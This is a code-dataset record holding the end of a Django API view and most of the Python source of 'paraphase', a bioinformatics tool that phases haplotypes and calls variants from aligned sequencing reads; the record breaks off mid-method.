JsonResponse({'status': 200, 'topicID': topicData, 'reviews': reviewsSerializer.data,\n 'polls': pollsSerializer.data, 'pc': pcData }, safe=False)\n # response = reviewsSerializer.data + pollsSerializer.data\n # return JsonResponse({'all': response}, safe=False)\n\n # Alternative code:\n # reviewsSerializer = ReviewSerializer(reviews, many=True)\n # pollsSerializer = PollSerializer(polls, many=True)\n # response = reviewsSerializer.data + pollsSerializer.data\n # return Response(response)\n\n # Data already exists\n except IntegrityError:\n return JsonResponse(UNIQUE_400, status=400)\n\n # User does not exist\n except ObjectDoesNotExist:\n return JsonResponse(USER_400, status=400)\n\n # POST request\n def post(self, request):\n return JsonResponse(GET_400, status=400)\n\n# https://stackoverflow.com/a/23788795","repo_name":"apregoe/knowItAllService","sub_path":"knowItAllService/knowItAllAPI/myPosts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"} +{"seq_id":"72511683110","text":"# paraphase\n# Author: Xiao Chen \n\n\nimport pysam\nimport os\nimport copy\nimport numpy as np\nfrom collections import Counter\nimport re\nimport logging\nfrom scipy.stats import poisson\nfrom collections import namedtuple\nfrom .haplotype_assembler import VariantGraph\n\n\nclass Phaser:\n clip_5p = r\"^\\d+S|^\\d+H\"\n clip_3p = r\"\\d+S$|\\d+H$\"\n deletion = r\"\\d+D\"\n fields = [\n \"total_cn\",\n \"gene_cn\",\n \"final_haplotypes\",\n \"two_copy_haplotypes\",\n \"alleles_final\",\n \"hap_links\",\n \"highest_total_cn\",\n \"assembled_haplotypes\",\n \"sites_for_phasing\",\n \"unique_supporting_reads\",\n \"het_sites_not_used_in_phasing\",\n \"homozygous_sites\",\n \"haplotype_details\",\n \"variant_genotypes\",\n \"nonunique_supporting_reads\",\n \"read_details\",\n \"genome_depth\",\n ]\n GeneCall = namedtuple(\n \"GeneCall\",\n fields,\n defaults=(None,) * len(fields),\n )\n MEAN_BASE_QUAL = 25\n\n def __init__(\n self,\n sample_id,\n outdir,\n wgs_depth=None,\n genome_bam=None,\n sample_sex=None,\n ):\n self.outdir = outdir\n self.sample_id = sample_id\n self.homopolymer_sites = {}\n self.het_sites = [] # for phasing\n self.het_no_phasing = []\n self.homo_sites = []\n self.candidate_pos = set()\n self.mdepth = wgs_depth\n self.genome_bam = genome_bam\n self.sample_sex = sample_sex\n\n def set_parameter(self, config):\n self.gene = config[\"gene\"]\n self.bam = os.path.join(\n self.outdir, self.sample_id + f\"_{self.gene}_realigned.bam\"\n )\n if os.path.exists(self.bam) is False:\n raise Exception(f\"File {self.bam} not found.\")\n self._bamh = pysam.AlignmentFile(self.bam, \"rb\")\n self.nchr = config[\"nchr\"]\n self.ref = config[\"data\"][\"reference\"]\n self._refh = pysam.FastaFile(self.ref)\n self.left_boundary = config.get(\"left_boundary\")\n self.right_boundary = config.get(\"right_boundary\")\n self.pivot_site = None\n if \"pivot_site\" in config:\n self.pivot_site = config[\"pivot_site\"]\n self.nchr_old = config[\"nchr_old\"]\n self.offset = int(self.nchr_old.split(\"_\")[1]) - 1\n if self.left_boundary is None:\n self.left_boundary = int(self.nchr_old.split(\"_\")[1])\n if self.right_boundary is None:\n self.right_boundary = int(self.nchr_old.split(\"_\")[2])\n self.use_supplementary = False\n if \"use_supplementary\" in config:\n self.use_supplementary = config[\"use_supplementary\"]\n self.to_phase = False\n if \"to_phase\" in config:\n self.to_phase = config[\"to_phase\"]\n self.is_reverse = False\n if \"is_reverse\" in config:\n self.is_reverse = config[\"is_reverse\"]\n self.clip_3p_positions = []\n self.clip_5p_positions = []\n if \"clip_3p_positions\" in config:\n self.clip_3p_positions = config[\"clip_3p_positions\"]\n if \"clip_5p_positions\" in config:\n self.clip_5p_positions = config[\"clip_5p_positions\"]\n self.noisy_region = []\n if \"noisy_region\" in config:\n self.noisy_region = config[\"noisy_region\"]\n\n def get_regional_depth(self, bam_handle, query_region, ninterval=100):\n \"\"\"Get depth of the query regions\"\"\"\n region_depth = []\n for region in query_region:\n depth = []\n nstep = max(1, int((region[1] - region[0]) / ninterval))\n for pos in range(region[0], region[1], nstep):\n site_depth = bam_handle.count(\n self.nchr, pos - 1, pos, read_callback=\"all\"\n )\n depth.append(site_depth)\n region_depth.append(np.median(depth))\n return region_depth\n\n def check_coverage_before_analysis(self):\n \"\"\"check low coverage regions for enrichment data\"\"\"\n region_depth = self.get_regional_depth(\n self._bamh, [[self.left_boundary, self.right_boundary]]\n )[0]\n if np.isnan(region_depth) or region_depth < 10:\n logging.warning(\n \"This region does not appear to have coverage. Will not attempt to phase haplotypes.\"\n )\n return False\n return True\n\n def get_homopolymer(self):\n \"\"\"Get the homopolymer sites\"\"\"\n seq = self._refh.fetch(self.nchr_old).upper()\n nstart = self.offset\n exclude = {}\n for i in range(len(seq) - 5):\n for nu in [\"A\", \"C\", \"G\", \"T\"]:\n if seq[i : i + 5].count(nu) >= 5:\n for pos in range(i + nstart, i + 7 + nstart):\n exclude.setdefault(pos, [])\n # position before homopolymer\n if seq[i - 1] != nu:\n exclude[i + nstart].append(nu)\n exclude[i + 1 + nstart] = [\"A\", \"C\", \"G\", \"T\"]\n # position after homopolymer\n if seq[i + 5] != nu:\n exclude[i + 6 + nstart].append(nu)\n exclude[i + 6 + nstart].append(\"1\")\n exclude = dict(sorted(exclude.items()))\n for pos in exclude:\n bases = \",\".join(list(set(exclude[pos])))\n if exclude[pos] == []:\n bases = \"0\"\n self.homopolymer_sites.setdefault(pos, bases)\n\n @staticmethod\n def depth_prob(nread, haploid_depth):\n \"\"\"Find probability of cn state based on depth\"\"\"\n prob = []\n for i in range(4):\n depthexpected = (i + 1) * haploid_depth\n pmf = poisson.pmf(nread, depthexpected)\n prob.append(pmf)\n sum_prob = sum(prob)\n if sum_prob == 0:\n return None\n post_prob = [float(a) / float(sum_prob) for a in prob]\n return post_prob\n\n @staticmethod\n def check_del(read, del_size):\n \"\"\"Find reads having the 6.3kb deletion in its cigar string\"\"\"\n del_len = [int(a[:-1]) for a in re.findall(Phaser.deletion, read.cigarstring)]\n if del_len != [] and abs(max(del_len) - del_size) < 50:\n return True\n return False\n\n def get_long_del_reads(\n self,\n p3_pos1,\n p3_pos2,\n p5_pos1,\n p5_pos2,\n del_size,\n min_clip_len=300,\n min_extend=1000,\n ):\n \"\"\"\n Find reads having big deletions. (Improve to general SVs for future)\n Could be softclipped at either side or have the deletion in cigar.\n Parameters:\n min_clip_len (int): minimum length for the soft-clip\n Returns: fully-spanning reads (set), partially spanning reads (set)\n \"\"\"\n bamh = self._bamh\n p5_reads = set()\n p3_reads = set()\n del_reads = set()\n # 3 prime clip\n pos1 = p3_pos1\n pos2 = p3_pos2\n reference_start_cutoff = pos1 - min_extend\n for read in bamh.fetch(self.nchr, pos1, pos2):\n read_name = self.get_read_name(read)\n find_clip_3p = re.findall(self.clip_3p, read.cigarstring)\n if find_clip_3p != [] and pos1 < read.reference_end < pos2:\n if (\n int(find_clip_3p[0][:-1]) >= min_clip_len\n and read.reference_start < reference_start_cutoff\n ):\n p3_reads.add(read_name)\n if self.check_del(read, del_size):\n del_reads.add(read_name)\n # 5 prime clip\n pos1 = p5_pos1\n pos2 = p5_pos2\n reference_end_cutoff = pos2 + min_extend\n for read in bamh.fetch(self.nchr, pos1, pos2):\n read_name = self.get_read_name(read)\n find_clip_5p = re.findall(self.clip_5p, read.cigarstring)\n if find_clip_5p != [] and pos1 < read.reference_start < pos2:\n if (\n int(find_clip_5p[0][:-1]) >= min_clip_len\n and read.reference_end > reference_end_cutoff\n ):\n p5_reads.add(read_name)\n if self.check_del(read, del_size):\n del_reads.add(read_name)\n if del_reads != set() or (p3_reads != set() and p5_reads != set()):\n return (\n del_reads.union(p3_reads.intersection(p5_reads)),\n del_reads.union(p3_reads).union(p5_reads),\n )\n return set(), set()\n\n def get_pivot_site_index(self):\n \"\"\"Return the index of the pivot site in list of het sites\"\"\"\n positions = [int(site.split(\"_\")[0]) for site in self.het_sites]\n if self.pivot_site in positions:\n return positions.index(self.pivot_site), True\n return -1, False\n\n def get_read_name(self, read):\n \"\"\"Rename reads when supplementary\"\"\"\n read_name = read.query_name\n if read.is_supplementary and self.use_supplementary:\n read_name = (\n read_name + f\"_sup_{read.reference_start}_{read.reference_length}\"\n )\n return read_name\n\n def get_read_names(self, read, partial_deletion_reads):\n \"\"\"Add read names for supplementary alignments\"\"\"\n read_names = [read.query_name]\n if read.is_supplementary and self.use_supplementary:\n sup_name = (\n read.query_name + f\"_sup_{read.reference_start}_{read.reference_length}\"\n )\n read_names = [sup_name]\n if (\n sup_name in partial_deletion_reads\n and read.query_name in partial_deletion_reads\n ):\n read_names.append(read.query_name)\n return read_names\n\n def get_haplotypes_from_reads(\n self,\n exclude_reads=[],\n min_mapq=5,\n min_clip_len=50,\n check_clip=False,\n partial_deletion_reads=[],\n kept_sites=[],\n add_sites=[],\n ):\n \"\"\"\n Go through reads and get bases at sites of interest.\n Two rounds, with variant site filtering in between.\n \"\"\"\n raw_read_haps = self.get_haplotypes_from_reads_step(\n exclude_reads,\n min_mapq,\n min_clip_len,\n check_clip,\n partial_deletion_reads,\n )\n self.remove_var(raw_read_haps, kept_sites)\n if self.het_sites != []:\n for var in add_sites:\n if var not in self.het_sites:\n self.het_sites.append(var)\n self.het_sites = sorted(self.het_sites)\n raw_read_haps = self.get_haplotypes_from_reads_step(\n exclude_reads,\n min_mapq,\n min_clip_len,\n check_clip,\n partial_deletion_reads,\n )\n return raw_read_haps\n\n def get_haplotypes_from_reads_step(\n self,\n exclude_reads=[],\n min_mapq=5,\n min_clip_len=50,\n check_clip=False,\n partial_deletion_reads=[],\n ):\n \"\"\"\n Go through reads and get bases at sites of interest\n Returns:\n read_haps (dict of str:list): collapse each read into just the positions\n of interest. 1 corresponds to ref, 2 corresponds to alt\n \"\"\"\n het_sites = self.het_sites\n read_haps = {}\n nvar = len(het_sites)\n for dsnp_index, allele_site in enumerate(het_sites):\n snp_position_gene1, allele1, allele2, *at = allele_site.split(\"_\")\n snp_position = int(snp_position_gene1)\n reads_with_flanking_indels = []\n for pileupcolumn in self._bamh.pileup(\n self.nchr,\n snp_position - 2,\n snp_position,\n truncate=True,\n min_base_quality=self.MEAN_BASE_QUAL,\n ):\n # require that the base on the read is not flanked by any indels\n if pileupcolumn.reference_pos == snp_position - 2:\n for read in pileupcolumn.pileups:\n if read.indel != 0 or read.is_del:\n read_names = self.get_read_names(\n read.alignment, partial_deletion_reads\n )\n for read_name in read_names:\n reads_with_flanking_indels.append(read_name)\n if pileupcolumn.reference_pos == snp_position - 1:\n for read in pileupcolumn.pileups:\n read_names = self.get_read_names(\n read.alignment, partial_deletion_reads\n )\n for read_name in read_names:\n if (\n not read.is_del\n and not read.is_refskip\n and not read.alignment.is_secondary\n and read.alignment.mapping_quality >= min_mapq\n and read_name not in exclude_reads\n and read.indel == 0\n and read_name not in reads_with_flanking_indels\n ):\n read_seq = read.alignment.query_sequence\n start_pos = read.query_position\n end_pos = start_pos + 1\n if end_pos < len(read_seq):\n hap = read_seq[start_pos:end_pos]\n if read_name not in read_haps:\n read_haps.setdefault(read_name, [\"x\"] * nvar)\n if hap.upper() == allele1.upper():\n read_haps[read_name][dsnp_index] = \"1\"\n elif hap.upper() == allele2.upper():\n read_haps[read_name][dsnp_index] = \"2\"\n\n # for softclips starting at a predefined position, mark sites as 0 instead of x\n if check_clip:\n for dsnp_index, allele_site in enumerate(het_sites):\n snp_position_gene1, allele1, allele2, *at = allele_site.split(\"_\")\n snp_position = int(snp_position_gene1)\n for clip_position in sorted(self.clip_3p_positions):\n if snp_position > clip_position:\n for read in self._bamh.fetch(\n self.nchr, clip_position - 10, clip_position + 10\n ):\n read_name = self.get_read_name(read)\n if read_name not in read_haps:\n read_haps.setdefault(read_name, [\"x\"] * nvar)\n if abs(read.reference_end - clip_position) < 20:\n find_clip_3p = re.findall(\n self.clip_3p, read.cigarstring\n )\n if (\n find_clip_3p != []\n and int(find_clip_3p[0][:-1]) >= min_clip_len\n ):\n read_haps[read_name][dsnp_index] = \"0\"\n for clip_position in sorted(self.clip_5p_positions, reverse=True):\n if snp_position < clip_position:\n for read in self._bamh.fetch(\n self.nchr, clip_position - 10, clip_position + 10\n ):\n read_name = self.get_read_name(read)\n if read_name not in read_haps:\n read_haps.setdefault(read_name, [\"x\"] * nvar)\n if abs(read.reference_start - clip_position) < 20:\n find_clip_5p = re.findall(\n self.clip_5p, read.cigarstring\n )\n if (\n find_clip_5p != []\n and int(find_clip_5p[0][:-1]) >= min_clip_len\n ):\n read_haps[read_name][dsnp_index] = \"0\"\n return read_haps\n\n def remove_var(self, raw_read_haps, kept_sites):\n \"\"\"remove variants that are not present after checking each read-haplotype\"\"\"\n bases_per_site = {}\n sites_to_remove = []\n for i in range(len(self.het_sites)):\n for read, hap in raw_read_haps.items():\n base = hap[i]\n bases_per_site.setdefault(i, []).append(base)\n\n for pos in bases_per_site:\n bases = bases_per_site[pos]\n bases_x = bases.count(\"x\")\n bases_ref = bases.count(\"1\")\n bases_alt = bases.count(\"2\")\n this_var = self.het_sites[pos]\n if bases_x == len(bases):\n sites_to_remove.append(this_var)\n elif bases_ref + bases_alt == len(bases) - bases_x and bases_alt <= 3:\n if this_var not in kept_sites:\n sites_to_remove.append(this_var)\n for var in sites_to_remove:\n if var in self.het_sites:\n self.het_sites.remove(var)\n\n def allow_del_bases(self, pos):\n return False\n\n def process_indel(self, pos, ref_seq, var_seq):\n \"\"\"Translate pysam indel seq into real sequence\"\"\"\n if \"+\" in var_seq:\n ins_base = var_seq.split(re.findall(r\"\\+\\d+\", var_seq)[0])[1]\n indel_size = len(ins_base)\n var_seq = ref_seq + ins_base\n else:\n del_len = int(re.findall(r\"\\-\\d+\", var_seq)[0][1:])\n indel_size = del_len\n var_seq = ref_seq\n offset_pos = pos - self.offset\n ref_seq = self._refh.fetch(\n self.nchr_old,\n offset_pos - 1,\n offset_pos + del_len,\n )\n return ref_seq, var_seq, indel_size\n\n def get_candidate_pos(self, regions_to_check=[], min_read_support=5, min_vaf=0.11):\n \"\"\"\n Get all polymorphic sites in the region, update self.candidate_pos\n \"\"\"\n bamh = self._bamh\n pileups_raw = {}\n for pileupcolumn in bamh.pileup(\n self.nchr,\n self.left_boundary,\n self.right_boundary,\n truncate=True,\n ):\n pos = pileupcolumn.pos + 1\n pileups_raw.setdefault(\n pos,\n [a.upper() for a in pileupcolumn.get_query_sequences(add_indels=True)],\n )\n variants = {}\n variants_no_phasing = {}\n for pos in pileups_raw:\n all_bases = pileups_raw[pos]\n total_depth = len(all_bases)\n del_bases_count = all_bases.count(\"*\")\n # get reference base\n offset_pos = pos - self.offset\n ref_seq_genome = self._refh.fetch(self.nchr_old, offset_pos - 1, offset_pos)\n\n if total_depth >= min_read_support and (\n del_bases_count < min_read_support or self.allow_del_bases(pos)\n ):\n all_bases = [a for a in all_bases if a != \"*\"]\n counter = Counter(all_bases)\n # include multi-allelic sites\n bases = counter.most_common(3)\n # homozygous\n if len(counter) == 1 or (\n len(counter) >= 2\n and bases[0][1] > len(all_bases) - min_read_support\n ):\n var_seq = bases[0][0]\n ref_seq = ref_seq_genome\n if var_seq != ref_seq:\n # SNV and indels\n if \"-\" not in var_seq and \"+\" not in var_seq:\n # \"homo\" sites in large deletions should be put back into het sites\n if (\n self.allow_del_bases(pos)\n and del_bases_count >= min_read_support\n and pos not in self.homopolymer_sites\n ):\n variants.setdefault(pos, []).append((ref_seq, var_seq))\n elif pos not in self.homopolymer_sites or (\n pos in self.homopolymer_sites\n and var_seq\n not in self.homopolymer_sites[pos].split(\",\")\n ):\n self.homo_sites.append(f\"{pos}_{ref_seq}_{var_seq}\")\n elif pos not in self.homopolymer_sites:\n ref_seq, var_seq, indel_size = self.process_indel(\n pos, ref_seq, var_seq\n )\n if indel_size < 25:\n self.homo_sites.append(f\"{pos}_{ref_seq}_{var_seq}\")\n elif len(counter) >= 2:\n found_ref = ref_seq_genome in [a[0] for a in bases]\n if found_ref:\n for var_seq, var_count in bases:\n ref_seq = ref_seq_genome\n if (\n var_seq != ref_seq\n and var_count >= min_read_support\n and var_count / total_depth > min_vaf\n ):\n # SNV\n if \"-\" not in var_seq and \"+\" not in var_seq:\n if pos not in self.homopolymer_sites:\n variants.setdefault(pos, []).append(\n (ref_seq, var_seq)\n )\n else:\n prohibited_bases = self.homopolymer_sites[\n pos\n ].split(\",\")\n if var_seq not in prohibited_bases:\n if \"1\" in prohibited_bases:\n variants.setdefault(pos, []).append(\n (ref_seq, var_seq)\n )\n else:\n variants_no_phasing.setdefault(\n pos, (ref_seq, var_seq)\n )\n # indels\n elif pos not in self.homopolymer_sites:\n ref_seq, var_seq, indel_size = self.process_indel(\n pos, ref_seq, var_seq\n )\n if indel_size < 25:\n variants_no_phasing.setdefault(\n pos, (ref_seq, var_seq)\n )\n\n # exclude variants caused by shifted softclips of the big deletions\n excluded_variants = []\n for region in regions_to_check:\n var_to_check = [a for a in variants if region[0] < a < region[1]]\n excluded_variants += var_to_check\n for pos in variants:\n # for now, filter out multi-allelic sites\n if pos not in excluded_variants and len(variants[pos]) == 1:\n ref_seq, var_seq = variants[pos][0]\n self.candidate_pos.add(f\"{pos}_{ref_seq}_{var_seq}\")\n\n excluded_variants = []\n for region in regions_to_check:\n var_to_check = [a for a in variants_no_phasing if region[0] < a < region[1]]\n excluded_variants += var_to_check\n for pos in variants_no_phasing:\n if pos not in excluded_variants:\n ref_seq, var_seq = variants_no_phasing[pos]\n self.het_no_phasing.append(f\"{pos}_{ref_seq}_{var_seq}\")\n\n def remove_noisy_sites(self):\n \"\"\"remove variants in predefined noisy sites\"\"\"\n problematic_sites = []\n for site in self.het_sites:\n for region in self.noisy_region:\n if region[0] <= int(site.split(\"_\")[0]) <= region[1]:\n problematic_sites.append(site)\n for site in problematic_sites:\n self.het_sites.remove(site)\n\n @staticmethod\n def simplify_read_haps(read_haps):\n \"\"\"Simplify read haplotypes for output\"\"\"\n haplotypes_to_reads = {}\n reads_to_haplotypes = {}\n for read in read_haps:\n hap = read_haps[read]\n haplotypes_to_reads.setdefault(\"\".join(hap), []).append(read)\n reads_to_haplotypes.setdefault(read, \"\".join(hap))\n return haplotypes_to_reads, reads_to_haplotypes\n\n def check_variants_in_haplotypes(self, variant):\n \"\"\"\n For variants not used in phasing, check which haplotypes they are in.\n \"\"\"\n dreads = {}\n var_pos, ref, alt = variant.split(\"_\")\n var_pos = int(var_pos)\n var_size = len(alt) - len(ref)\n if var_size < 0:\n indel_N = \"N\" * abs(var_size)\n indel_base_in_read = f\"{ref[0]}{var_size}{indel_N}\"\n elif var_size > 0:\n indel_base_in_read = f\"{ref[0]}+{var_size}{alt[1:]}\"\n ref_base = ref[0]\n alt_base = alt[0] if var_size == 0 else indel_base_in_read\n for pileupcolumn in self._bamh.pileup(\n self.nchr,\n var_pos - 1,\n var_pos,\n truncate=True,\n ):\n read_names = pileupcolumn.get_query_names()\n bases = [\n a.upper() for a in pileupcolumn.get_query_sequences(add_indels=True)\n ]\n for i, read in enumerate(read_names):\n if bases[i] == ref_base:\n dreads.setdefault(read, \"ref\")\n elif bases[i] == alt_base:\n dreads.setdefault(read, \"alt\")\n else:\n dreads.setdefault(read, \".\")\n return dreads\n\n @staticmethod\n def get_start_end(hap):\n \"\"\"get range of positions that are not x\"\"\"\n haplen = len(hap)\n for nstart, base in enumerate(hap):\n if base != \"x\":\n break\n for nend in reversed(range(haplen)):\n if hap[nend] != \"x\":\n break\n return nstart, nend\n\n def get_hap_variant_ranges(self, hap):\n \"\"\"get boundaries of (partial) haplotypes\"\"\"\n nstart, nend = self.get_start_end(hap)\n if nstart == 0:\n nstart_previous_pos = self.left_boundary\n else:\n nstart_previous = nstart - 1\n nstart_previous_pos = int(self.het_sites[nstart_previous].split(\"_\")[0]) + 1\n if nend == len(hap) - 1:\n nend_next_pos = self.right_boundary\n else:\n nend_next = nend + 1\n nend_next_pos = int(self.het_sites[nend_next].split(\"_\")[0]) - 1\n return nstart_previous_pos, nend_next_pos\n\n def output_variants_in_haplotypes(self, haps, reads, nonunique, two_cp_haps=[]):\n \"\"\"\n Summarize all variants in each haplotype.\n Output all variants and their genotypes.\n Haplotypes are different length, so a range (boundary) is reported\n \"\"\"\n het_sites = self.het_sites\n haplotype_variants = {}\n haplotype_info = {}\n dvar = {}\n var_no_phasing = copy.deepcopy(self.het_no_phasing)\n for hap, hap_name in haps.items():\n haplotype_variants.setdefault(hap_name, [])\n # het sites not used in phasing\n if reads != {}:\n for var in var_no_phasing:\n genotypes = []\n var_reads = self.check_variants_in_haplotypes(var)\n haps_with_variant = []\n for hap, hap_name in haps.items():\n hap_reads = reads[hap]\n hap_reads_nonunique = [a for a in nonunique if hap in nonunique[a]]\n genotype = self.get_genotype_in_hap(\n var_reads, hap_reads, hap_reads_nonunique\n )\n genotypes.append(genotype)\n if genotype == \"1\":\n haps_with_variant.append(hap_name)\n if haps_with_variant == []:\n self.het_no_phasing.remove(var)\n else:\n for hap_name in haps_with_variant:\n haplotype_variants[hap_name].append(var)\n dvar.setdefault(var, genotypes)\n # het sites and homo sites\n for hap, hap_name in haps.items():\n for i in range(len(hap)):\n if hap[i] == \"2\":\n haplotype_variants[hap_name].append(het_sites[i])\n # need some coordinate check if there is long deletion\n haplotype_variants[hap_name] += self.homo_sites\n\n var_nstart, var_nend = self.get_hap_variant_ranges(hap)\n var_tmp = haplotype_variants[hap_name]\n var_tmp1 = [\n a for a in var_tmp if var_nstart <= int(a.split(\"_\")[0]) <= var_nend\n ]\n var_tmp1 = list(set(var_tmp1))\n var_tmp2 = sorted(var_tmp1, key=lambda x: int(x.split(\"_\")[0]))\n haplotype_info.setdefault(\n hap_name, {\"variants\": var_tmp2, \"boundary\": [var_nstart, var_nend]}\n )\n\n # summary per variant\n all_haps = haps\n nhap = len(all_haps)\n for var in self.homo_sites:\n dvar.setdefault(var, [\"1\"] * nhap)\n for i, var in enumerate(het_sites):\n dvar.setdefault(var, [])\n for hap, hap_name in haps.items():\n base_call = \".\"\n if hap[i] == \"2\":\n base_call = \"1\"\n elif hap[i] == \"1\":\n base_call = \"0\"\n dvar[var].append(base_call)\n if hap_name in two_cp_haps:\n dvar[var].append(base_call)\n\n return haplotype_info, {\n var: \"|\".join(dvar[var]) for var in dict(sorted(dvar.items()))\n }\n\n def get_genotype_in_hap(self, var_reads, hap_reads, hap_reads_nonunique):\n \"\"\"For a given variant, return its status in a haplotype\"\"\"\n hap_reads_contain_var = [var_reads[a] for a in hap_reads if a in var_reads]\n if len(hap_reads_contain_var) < 3:\n hap_reads_contain_var += [\n var_reads[a] for a in hap_reads_nonunique if a in var_reads\n ]\n if len(hap_reads_contain_var) >= 3:\n hap_reads_contain_var_counter = Counter(hap_reads_contain_var).most_common(\n 2\n )\n if len(hap_reads_contain_var_counter) == 1 or hap_reads_contain_var_counter[\n 1\n ][1] <= min(hap_reads_contain_var_counter[0][1] * 0.15, 2):\n if hap_reads_contain_var_counter[0][0] == \"alt\":\n return \"1\"\n elif hap_reads_contain_var_counter[0][0] == \"ref\":\n return \"0\"\n return \".\"\n\n @staticmethod\n def update_reads_for_deletions(\n raw_read_haps, het_sites, n1, n2, del_reads_partial, base, del_name\n ):\n \"\"\"\n For reads carrying known big deletions, update read haplotype to\n reflect the deletion. This is needed for downstream phasing\n \"\"\"\n pos1 = -1\n pos2 = -1\n for i, var in enumerate(het_sites):\n if int(var.split(\"_\")[0]) > n1:\n pos1 = i\n break\n for i, var in enumerate(het_sites):\n if int(var.split(\"_\")[0]) > n2:\n pos2 = i\n break\n if pos1 != -1 and pos2 != -1:\n if pos1 < pos2:\n for read in del_reads_partial:\n if read in raw_read_haps:\n hap = list(raw_read_haps[read])\n for i in range(pos1, pos2):\n hap[i] = base\n raw_read_haps[read] = \"\".join(hap)\n elif pos1 == pos2:\n het_sites.insert(pos1, del_name)\n for read in raw_read_haps:\n hap = list(raw_read_haps[read])\n hap.insert(pos1, \"x\")\n if read in del_reads_partial:\n hap[pos1] = base\n elif (\n hap[pos1 - 1] == \"0\"\n and pos1 - 1 >= 0\n and hap[pos1 + 1] == \"0\"\n and pos1 + 1 < len(hap)\n ):\n hap[pos1] = \"0\"\n else:\n flanking_left = hap[max(0, pos1 - 2) : pos1]\n flanking_right = hap[\n min(pos1 + 1, len(hap)) : min(pos1 + 3, len(hap))\n ]\n if \"x\" not in flanking_left and \"x\" not in flanking_right:\n hap[pos1] = \"1\"\n raw_read_haps[read] = \"\".join(hap)\n return raw_read_haps, het_sites\n\n def get_read_counts(self, uniquely_supporting_haps):\n \"\"\"\n Get unique supporting read counts for each haplotype\n \"\"\"\n if uniquely_supporting_haps == {}:\n return {}\n nhap = len(uniquely_supporting_haps)\n nvar = len(self.het_sites)\n hap_bases = []\n for i in range(nhap):\n hap_bases.append([])\n j = 0\n for hap in uniquely_supporting_haps:\n reads = uniquely_supporting_haps[hap]\n for i in range(nvar):\n bases = [a[i] for a in reads]\n hap_bases[j].append(len(bases) - bases.count(\"x\"))\n j += 1\n ranges = []\n for i in range(nvar):\n if min([hap_bases[a][i] for a in range(nhap)]) >= 5:\n for j in range(nvar):\n if j > i:\n if min([hap_bases[a][j] for a in range(nhap)]) < 5:\n ranges.append([i, j])\n break\n if j == nvar - 1 and j > i:\n ranges.append([i, nvar - 1])\n if ranges == []:\n return None\n longest_range = sorted(ranges, key=lambda x: x[1] - x[0], reverse=True)[0]\n mid = int((longest_range[1] + longest_range[0]) / 2)\n nstart = max(mid - 1, longest_range[0])\n nend = min(mid + 1, longest_range[1])\n if nend == nstart:\n return None\n\n read_count = {}\n for hap in uniquely_supporting_haps:\n reads = uniquely_supporting_haps[hap]\n lreads = [a for a in reads if a[nstart:nend] != \"x\" * (nend - nstart)]\n read_count.setdefault(hap, len(lreads))\n return read_count\n\n def phase_haps(self, raw_read_haps, min_support=4, debug=False):\n \"\"\"\n Assemble and evaluate haplotypes\n \"\"\"\n het_sites = self.het_sites\n haplotypes_to_reads, raw_read_haps = self.simplify_read_haps(raw_read_haps)\n\n ass_haps = []\n original_haps = []\n nvar = len(het_sites)\n hcn = 0\n if nvar == 0:\n return ([], [], 0, {}, {}, {}, None)\n elif nvar == 1:\n ass_haps = [\"1\", \"2\"]\n original_haps = [\"1\", \"2\"]\n else:\n pivot_index, _ = self.get_pivot_site_index()\n hap_graph = VariantGraph(\n raw_read_haps, pivot_index, figure_id=self.sample_id\n )\n ass_haps, original_haps, hcn = hap_graph.run(debug=debug, make_plot=debug)\n\n if ass_haps == []:\n return (ass_haps, original_haps, hcn, {}, {}, raw_read_haps, None)\n\n (\n uniquely_supporting_reads,\n nonuniquely_supporting_reads,\n read_counts,\n ) = self.get_read_support(raw_read_haps, haplotypes_to_reads, ass_haps)\n\n # remove spurious ones\n ass_haps = self.adjust_spurious_haplotypes(uniquely_supporting_reads)\n (\n uniquely_supporting_reads,\n nonuniquely_supporting_reads,\n read_counts,\n ) = self.get_read_support(raw_read_haps, haplotypes_to_reads, ass_haps)\n\n # remove low-support ones\n ass_haps = [\n a\n for a in uniquely_supporting_reads\n if len(uniquely_supporting_reads[a]) >= min_support\n ]\n (\n uniquely_supporting_reads,\n nonuniquely_supporting_reads,\n read_counts,\n ) = self.get_read_support(raw_read_haps, haplotypes_to_reads, ass_haps)\n\n return (\n ass_haps,\n original_haps,\n hcn,\n uniquely_supporting_reads,\n nonuniquely_supporting_reads,\n raw_read_haps,\n read_counts,\n )\n\n def get_read_support(self, raw_read_haps, haplotypes_to_reads, ass_haps):\n \"\"\"Find uniquely and nonuniquely supporting reads for given haplotypes\"\"\"\n read_support = VariantGraph.match_reads_and_haplotypes(raw_read_haps, ass_haps)\n uniquely_supporting_haps = read_support.unique\n read_counts = self.get_read_counts(uniquely_supporting_haps)\n\n uniquely_supporting_reads = {}\n for hap in ass_haps:\n uniquely_supporting_reads.setdefault(hap, [])\n for hap in uniquely_supporting_haps:\n for read_hap in uniquely_supporting_haps[hap]:\n uniquely_supporting_reads[hap] += haplotypes_to_reads[read_hap]\n for hap in uniquely_supporting_haps:\n uniquely_supporting_reads[hap] = list(set(uniquely_supporting_reads[hap]))\n\n nonuniquely_supporting_reads = {}\n for read in read_support.by_read:\n num_matches = len(read_support.by_read[read])\n if num_matches > 1:\n nonuniquely_supporting_reads.setdefault(\n read, read_support.by_read[read]\n )\n return (\n uniquely_supporting_reads,\n nonuniquely_supporting_reads,\n read_counts,\n )\n\n def compare_depth(self, haplotypes, loose=False):\n \"\"\"\n For each haplotype, identify the variants where it's different\n from other haplotypes. Check depth at those variant sites and\n see if the depth suggests twice coverage.\n \"\"\"\n if haplotypes is None or len(haplotypes) == 1:\n return []\n two_cp_haps = []\n bamh = self._bamh\n boundaries = [haplotypes[a][\"boundary\"] for a in haplotypes]\n nstart = max([a[0] for a in boundaries])\n nend = min(a[1] for a in boundaries)\n variants = set()\n for hap in haplotypes:\n vars = haplotypes[hap][\"variants\"]\n for var in vars:\n if len(var.split(\"_\")) == 3:\n pos, ref, alt = var.split(\"_\")\n pos = int(pos)\n if nstart < pos < nend and var in self.het_sites:\n variants.add(var)\n\n for hap in haplotypes:\n sites = {}\n other_haps = [a for a in haplotypes.keys() if a != hap]\n other_cn = len(other_haps)\n this_hap_var = haplotypes[hap][\"variants\"]\n other_haps_var = []\n for a in other_haps:\n other_haps_var += haplotypes[a][\"variants\"]\n for var in variants:\n pos, ref, alt = var.split(\"_\")\n pos = int(pos)\n if var in this_hap_var and var not in other_haps_var:\n sites.setdefault(pos, alt)\n elif var not in this_hap_var and other_haps_var.count(var) == other_cn:\n sites.setdefault(pos, ref)\n\n counts = []\n for pos in sites:\n hap_base = sites[pos]\n for 